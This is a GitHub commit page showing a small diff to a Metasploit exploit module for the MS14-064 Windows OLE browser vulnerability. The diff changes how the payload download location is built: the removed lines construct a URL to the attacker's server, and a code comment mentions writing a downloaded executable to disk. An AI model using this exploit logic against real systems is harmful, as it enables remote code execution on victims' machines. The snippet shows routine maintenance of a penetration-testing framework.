We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
2 parents 68cb766 + 89e27d9 commit 955c055Copy full SHA for 955c055
modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
@@ -277,10 +277,7 @@ def vbs_vector(prep)
277
vbs_name = "#{Rex::Text.rand_text_alpha(rand(16)+4)}.vbs"
278
gif_name = "#{Rex::Text.rand_text_alpha(rand(5)+3)}.gif"
279
280
- payload_src = (datastore['SSL'] ? 'https' : 'http')
281
- payload_src << '://'
282
- payload_src << (datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST'])
283
- payload_src << ":#{datastore['SRVPORT']}#{get_module_resource}/#{gif_name}"
+ payload_src = "#{gif_name}"
284
285
# I tried to use ADODB.Stream to save my downloaded executable, but I was hitting an issue
286
# with it, so I ended up with Scripting.FileSystemObject. Not so bad I guess.
0 commit comments